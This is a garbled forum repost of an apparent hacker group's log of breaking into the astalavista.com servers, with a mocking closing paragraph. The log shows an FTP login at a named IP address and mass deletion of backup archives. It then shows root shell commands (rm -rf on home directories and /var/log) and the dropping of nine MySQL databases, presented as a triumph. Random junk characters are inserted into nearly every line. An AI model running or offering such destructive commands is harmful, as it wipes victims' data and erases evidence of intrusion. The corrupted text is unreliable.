3 w/ T$ D4 q6 D3 A& [1 b7 S2 V' bKERBEROS_V4 rejected as an authentication type6 w N+ b+ J' Q J2 |" l2 l
Name (212.254.194.163:root): astalavista.com& n% r9 ?% N6 B1 {2 L7 Y0 h
331 Password required for astalavista.com.
9 L/ ~; A* \& tPassword:& h4 ]( h0 \9 n. @& ]
230 User astalavista.com logged in.
) ]8 I8 ?1 T6 t3 ]. Z$ F7 KRemote system type is UNIX.1 S* Z1 w9 |7 Y% [; A% _* S
Using binary mode to transfer files.* c8 U" p5 e; n9 K
ftp> ls -la
( J9 I* ~3 N4 L227 Entering Passive Mode (212,254,194,163,2,188)1 B& B& o/ R: F, u6 g
150 Opening BINARY mode data connection for ‘file list’.
/ [# B6 U5 C( Q! q3 _# Ydr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com3 t c+ r) C. f( ~. J/ I0 v
226 Transfer complete.5 {, c# Z/ H" {1 t6 l
ftp> cd astalavista.com$ V8 x9 g' Q G: s& O
250 CWD command successful.- h X- `+ x; G4 W. Z5 ^' }
ftp> ls -la' X7 ^; j. p$ j0 t) u0 w! A
227 Entering Passive Mode (212,254,194,163,2,189)
) x; d* n3 S3 ]3 ^150 Opening BINARY mode data connection for ‘file list’./ j8 H! |$ a! Q; R* G4 `
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar) z/ ]4 C% P/ f! v
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz25 {% U3 ]9 J; Z+ `
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2! V9 j- l; a* ^ ?$ Z
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar- d7 r3 v' ^: Q3 s2 E6 K
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar
" P7 r4 ~8 m: X; X8 `' A8 K" q[snip]: X, v1 Q2 H1 }! @$ ?
226 Transfer complete.
, x8 w0 q1 ~$ [ftp> mdelete *3 J* v2 `! D/ }, G2 ~
ftp> ls -la* g; C# G$ A% l' S8 f% x
227 Entering Passive Mode (212,254,194,163,2,193)
& }$ P) x' Z% ~" D# S$ J150 Opening BINARY mode data connection for ‘file list’.
) V& D8 H) z; p: n/ @# n* y! D226 Transfer complete.
( o, S" R8 u' zftp>
8 [! k! y1 Q" m" f# @9 Y& h. w8 R+ M$ H% u+ ~# O$ m! J: Y
sh-3.2# cd /home
2 D+ m! m) i2 c0 J @9 Gsh-3.2# ls -la0 a0 |- o5 ^ k9 z6 `4 S" }
total 120
# S. @5 A, g5 j. Ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
" ?0 o. d' {2 G. L4 t1 K( t3 fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..3 d2 }- a1 C" ~, P9 J
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin, P J5 \" m( j( y1 X9 @. F6 U+ T
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group+ H& J* X9 `* a
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user- E9 j- s; |5 ?: q, t# k6 x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet7 n4 `9 g5 }8 }% l2 s' t
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
* H$ S. u! H1 f( qdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
' O/ o) v# N3 F& y# `drwx–x–x 10 com com 4096 Apr 28 12:40 com
% `! x* s9 `" J2 edrwxr-xr-x 2 root root 4096 May 17 2007 ftp: r9 I3 {) I. D! L
drwx—— 3 jon jon 4096 Sep 21 2007 jon
# d0 q4 r2 z0 z d& Rdrwx—— 2 root root 16384 Sep 11 2007 lost+found5 C, F8 j- B- i# A6 I3 _7 h
drwxr-xr-x 2 root root 4096 Sep 14 2007 my9 v) Q' g: ]. G- U) H2 F
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata2 W9 B0 t8 c; i! ?5 i/ u: m
drwx—— 2 jon jon 4096 Sep 15 2007 test, N1 a, x, m# r$ }% q
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp) }; @; `. p ?/ E( }
+ N3 D: w: x! a1 V2 tsh-3.2# rm -rf backup/( F; N" g+ Y: y7 Z; D7 l, }% o
sh-3.2# rm -rf backup.14161/
6 u. b# K# m; ^: Rsh-3.2# rm -rf ftp/& I" F' c3 V) ~
sh-3.2# rm -rf jon/
; }) K8 F$ u9 t: N4 v: vsh-3.2# rm -rf my/
/ q* Q7 t# c/ D( {sh-3.2# rm -rf mysqldata/. L' F e5 c5 J2 N
sh-3.2# rm -rf test/4 r6 S8 j* | a) X; p* d9 `& C, H
sh-3.2# rm -rf tmp/
' k& V) ?( e+ G0 Ish-3.2# cd ~( n4 r9 X4 Y0 w8 L. n
sh-3.2# rm -rf *
* }" U5 m/ m& N7 M rsh-3.2# rm -rf /var/log/
# X% [& t. Y+ m9 @( v- N! a$ L: [rm: cannot remove directory `/var/log//proftpd’: Directory not empty
4 ^) Z$ S% ~: d# P& Rsh-3.2# rm -rf /home/*
9 V6 e5 S. h1 g4 qsh-3.2# mysql5 s i! A. Q F- F
Welcome to the MySQL monitor. Commands end with ; or \g.3 p0 ^) Y D8 O" H' n. z Y5 ~6 D
Your MySQL connection id is 407156- ]* a2 [: {5 s: J0 u1 T
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( P. I6 Y i9 c+ G, w$ \ \) H
+ g# y- Q( |$ O6 f
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
) p% [9 B& }2 l
' o! K; W5 y! G+ f1 c) i1 V% K2 ^mysql> show databases; \% W7 g: F o
+———————–+
2 ]) X" ~* D1 m# h$ J2 U9 N| Database |% `# A# X1 n- F8 e: `' z+ K( E
+———————–+3 I$ v; r5 I, E, }7 f c. _# R- L
| information_schema |
6 r$ _& x; U, U2 e1 w2 d) A; t5 _| astanet_ads |
. e/ N5 K, E# ?. N| astanet_mailing_lists |6 a* D' ]& ^7 j3 v* I; x
| astanet_mediawiki |
. O" d3 Q/ ]4 w* t0 b| astanet_membersystem |/ V6 Q7 c* [4 Q+ n& q7 d- q
| com_contrexx |
( N( c# l/ ]" Q# c, I/ t| com_contrexx2 |
0 g# i; G6 Z( p+ l| com_contrexx2_live |
, v& Y* ]4 g: A4 P: U/ d2 W| da_roundcube |
1 i1 J5 z% R Q7 J7 X1 d. g| dolphin |0 B, b; p5 f# |. n8 Z2 ^: A! {
| ideapool |# w; I ~( q$ Q; I3 J# R7 F
| mysql |2 R, [ T* E" n3 ?1 d. L) V
| test |
) v1 i- b$ ~2 d$ r* J| yourmaster |8 h: q4 |3 K1 U7 w2 T6 \3 h
+———————–+; O! ]& G. f6 M6 X6 x
14 rows in set (0.03 sec)
! G- H9 N0 R0 U& Z! n# r. |& W2 D: n/ Y; | u1 V" d: {% K
mysql> drop database astanet_membersystem;
1 l0 h6 ~( f6 j& e! N7 X4 ZdroQuery OK, 46 rows affected (0.81 sec)
$ I/ L, C/ U- J# n) ^4 ~2 g
, |! w u7 E$ Umysql> drop database com_contrexx;0 c& [2 i0 J3 |$ z5 A
Query OK, 211 rows affected (2.72 sec)6 y: s& {' z2 z/ J- K. h
~* q( k. M$ R0 x5 T F( j6 p
mysql> drop database com_contrexx2;
: b/ x" ~$ I* m9 c/ EQuery OK, 237 rows affected (2.23 sec)3 `0 Z" J% \: q8 Z- G6 E! E
' a2 X- v0 f6 G- W* [! C. Qmysql> drop database com_contrexx2_live;; I: ^ ~2 }* m. U# W
Query OK, 227 rows affected (7.63 sec)
3 I' R# J1 h" c# Q- O
+ [' S% O o! Bmysql> drop database ideapool;; j5 b7 ~! K6 u* V5 l6 y
Query OK, 69 rows affected (0.19 sec)
& m4 p: h: ^. W( U
/ V. l5 ?" c: U, @" Mmysql> drop database yourmaster;
2 s4 w8 `: J2 FQuery OK, 158 rows affected (0.55 sec)
, u7 K8 U! ^6 b. l- B: S, v6 u- d5 I* ^# ?! D
mysql> drop database astanet_ads;& M- ^' s% x; f* E$ [' R5 t$ T
Query OK, 9 rows affected (0.11 sec), W8 U: u7 M1 A
+ |5 `$ m& c# Z9 f0 L- a k, r
mysql> drop database astanet_mailing_lists;) X, I; C" M& Q* g
Query OK, 24 rows affected (1.47 sec)+ r5 w, Z# |) n7 B6 Z9 c
0 f1 v( o7 T' I2 [
mysql> drop database astanet_mediawiki;. P4 _3 N% `9 o5 R9 _+ l2 E
Query OK, 31 rows affected (0.51 sec)
4 q5 N9 T$ d& o6 p, W8 i6 o5 b
. k$ J: P8 r! C- h( ?mysql> show databases;
6 u1 z$ K; C" c+——————–+
" F+ L! F) ~+ X9 K% l8 F9 g% O| Database |1 u3 R# I- Q+ Z. j
+——————–+
- m! v% U! ]" Y1 e| information_schema |3 q( W8 q. F5 n q( |6 _1 F- `
| da_roundcube |
7 z9 x" H) ^* t| dolphin |; O, Z; k3 @+ R2 e
| mysql |" w1 ^* D0 a) j8 ]( p
| test |3 O2 I& V* p/ N) ~9 ~$ l9 Q+ K }$ F
+——————–+
& J' V9 c) N( {! P# m' h5 L! j5 rows in set (0.00 sec)
3 }" L, z3 r% V6 g- S1 k" C) C8 W+ W( W: r
What a journey! We’re not sure exactly why the “Terminator” had any influence on
J0 {1 k! a; y ^, R7 Z; Ftheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
1 Z# _: \; [$ _/ `wrong to say this pack of morons *wont be back*.
3 Q$ o g$ r, `( f5 D6 L* a) Z |
发表于 2012-11-6 21:07:34
收藏
支持
反对